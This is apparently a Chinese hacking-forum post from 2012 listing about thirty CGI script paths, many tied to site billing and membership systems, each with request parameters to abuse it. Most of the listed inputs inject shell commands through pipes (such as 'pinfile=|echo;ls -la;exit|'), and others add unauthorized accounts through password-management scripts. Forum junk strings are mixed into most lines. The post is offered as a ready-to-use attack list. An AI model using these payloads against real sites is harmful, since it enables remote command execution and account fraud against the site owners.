找回密码
 立即注册
查看: 3000|回复: 0
打印 上一主题 下一主题

Cgi-bin 30个漏洞+使用方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:55:26 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
==============================& l0 P  s  e0 P

( X: W& ?& Y" d# K" {  r+ l  K/smspass.pl  r: k& s; k' X* Q
username=username&password=password
4 t1 \9 O7 n$ I' A4 ~( b" R* g2 u) ]" I2 a) g
/index.cgi% I" m6 v4 t: l3 w2 f7 S
wei=ren&gen=command0 E, n0 Z3 N/ N8 P( I, P  t3 S
; [) |* X" Z2 d' Q. N& N6 l
/passmaster.cgi: Q9 W! g: T2 z1 O2 `+ f2 V
Action=Add&Username=Username&Password=Password
: B+ |  B! f7 z# T
5 d8 X) D9 k$ V) `+ r( E/accountcreate.cgi
3 U7 q) O2 l$ e* c, _( tusername=username&password=password&ref1=|echo;ls|! C4 ]- z3 K! m' w

, G" B# Y+ r+ s7 [  y2 b) H/form.cgi
/ u6 D5 H. B7 _' M, y' ^name=xxxx&email=email&subject=xxxx&response=|echo;ls|& o0 x; R9 L' g! y! T2 w" f

2 C* W# K" Y# ?  v/addusr.pl
4 Q4 m) h8 z$ i: k; w3 u8 X: S/cgi-bin/EuroDebit/addusr.pl
" O5 }7 h# O6 i6 w$ m( w' I; {user=username&pass=Password&confirm=Password$ j* u4 `2 r- g2 M2 H
- |2 n+ L1 C3 ^$ m! Z
/ccbill-local.asp
9 T% a. ^$ Q, g0 N$ t, Mpost_values=username:password
% K/ s" l; S( w; S6 b3 ]" w. d" D1 R, w4 H! E0 l
/count.cgi" j7 w6 C; I& W2 ~1 D( n4 d0 E8 C
pinfile=|echo;ls -la;exit|
8 J- z7 }) ~: b9 Y! k+ x: R# D
& ]8 E& b, A4 H, c& `/recon.cgi
" V" o3 D: ~* Q/ A3 i: D1 o! M% l/recon.cgi?search
4 k. B# Q$ T: Hsearchoption=1&searchfor=|echo;ls -al;exit|3 h8 ?6 p; c# \! u
# Y& I+ M2 y' x3 C4 H) \
/verotelrum.pl
+ R& |9 F! V, T, d! r0 h4 g; P: Mvercode=username:password:dseegsow:add:amount<&30>7 R  Z. p% F! |" z

1 v$ i. N. K' [4 e, }) I/ ]/af.cgi
. z4 v  `, o5 k/ q: `( n_browser_out=|echo;ls -la;exit;|
0 I' X( h5 F$ t( W$ o, F; a. F
& D% M* `! z2 _1 `/modify.cgi+ I4 L. C3 _2 a; E
username=username&password=password&expire=30
, `/ u# H8 C9 e( }- K5 N6 c  _% C
! H4 H: ]- R6 r- B6 o/openjournal.cgi: i" k6 S" t! W" B: f
edit=1&ct=2&go=|echo;ls -al;exit|
$ j& K/ m+ G4 D5 {: ~
! A# Q2 E6 [% X/ O) }0 g* t1 {5 B/gx9passwd.cgi' ?! f& l/ g9 d& p
cmd=ADD&user=username&pass=password
0 U9 c5 N- F; E; f6 d: C8 l6 ~+ |  T
* A( r3 \% |, f2 Y  F9 H. E/probecontrol.cgi, e  W4 A- c( I; z! ^
command=enable&username=username&password=password
% L5 T9 M+ q+ z( O: B- b: |, V5 s, y( {% Z# G9 r7 O( U' b" l. h
/recon.cgi
: e7 J4 \5 ^. _" h* M( Ssearchoption=3&searchfor=echo;ls -la;exit
( x3 B; r: ]1 }6 w2 o+ n
, j9 u9 T# w+ \0 {/htadd.pl" m' r/ o) L$ D- n0 ]* f" z; E
configfile=|echo; ls -alt; exit
  ?/ n9 T/ L# C; {7 \. g+ i
  Q# c3 p8 \. @$ X/gx9passwd.cgi4 @3 |% `+ t) d% z  T' d) _  `* ?
cmd=ADD&user=username&pass=password' x! `$ {3 G/ @% ~9 t
5 M2 [2 f+ O, V7 }* q3 Y
/ibill*.pl, A4 V( w* w" y9 b. L2 q5 G, @
reqtype=add&authpwd=authpwd&username=username&password=password
7 R! W  O1 i% C3 U+ [9 ?
) F* B+ B+ ?, C/cpay.cgi# W  F. h: t$ W/ }7 B1 s
command=add_member&username=username(EMAIL)&password=password(DES)
, p, Z+ y4 y* l$ _
) N( T1 y# r& }* M' A/globill_ut.cgi4 v/ z! @  O' b1 h' m; v
do=add&username=username&password=password&wpassword=password; h% G7 q0 Y6 [  v
3 p' c+ J- T! N+ H  |
/usercontrol.cgi8 p" _- l. }5 C
command=enable&username=USER&password=PASS
: H0 I; D# A1 W
$ ~* D# v4 c6 c! B/globoSALErum.cgi
3 S9 v. \, v9 Saction=ADD&seccode=seccode&login=username&password=password  g" l$ R# p' \+ t: R# b1 U
5 T! C, M: o3 u: R9 F" l6 ~+ {& U3 k
/addusr.pl. M7 Q9 O: z; N7 o* \; s- V- G$ F* V
user=USER&pass=PASS&confirm=PASS! u# Y. r; a. G4 a) W
, }; ^% ?4 X. x$ R5 R' s) P5 i" M
/pincount.cgi
. L/ h: L; C. s0 I9 k+ P( b2 {/cgi-bin/mastergate/pincount.cgi
4 |" n1 N( K3 [( I% Kpinfile=|echo;pwd;exit|, f+ f0 _0 i4 }

3 U3 |. ?  L/ |# p/accountcreate.cgi
7 ]; J7 b7 \+ i2 ?2 V/cgi-bin/gateway/accountcreate.cgi( H' E; O& o* S, D, p
username=username&password=password&password2=password&ref1=|echo;ls -al;exit
: h; r0 Z& Q( l; F# A; Z* A6 C2 J4 r& P$ C) Y6 @6 v
/af.cgi
! C9 k  y( U* c5 t# x/env.cgi4 w* p* t8 S$ v+ V* e9 f0 Y+ s+ L
ADD+;echo;pwd;exit
* P$ u% J  y# g8 l; i  g* `) p
% A, H7 k( g% X0 P, s( X/count.cgi* q1 Q7 s' X2 n
pinfile=|echo;pwd;exit|
% X4 b2 A  [5 f
2 V- \& P$ s0 |6 P2 B8 g0 r  h/recon.cgi
( D3 a6 U2 l) ]( ^: M+ \8 Ysearchoption=1&searchfor=|echo;ls%20-al;exit|! u: a. C7 x% O3 q% M* c- n& h3 n

, d8 _' K7 c) p" `" j/add.cgi
/ o+ o8 q7 ^. m4 ]( x3 Iusername=username&password=password&expire=30
" f- A. J6 K# ~8 H; ?- `* J" W8 E0 l! D) c  N# j' c# X/ `$ c8 P
==============================& z# q+ k. y# H# j1 L( v$ e! P1 U
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表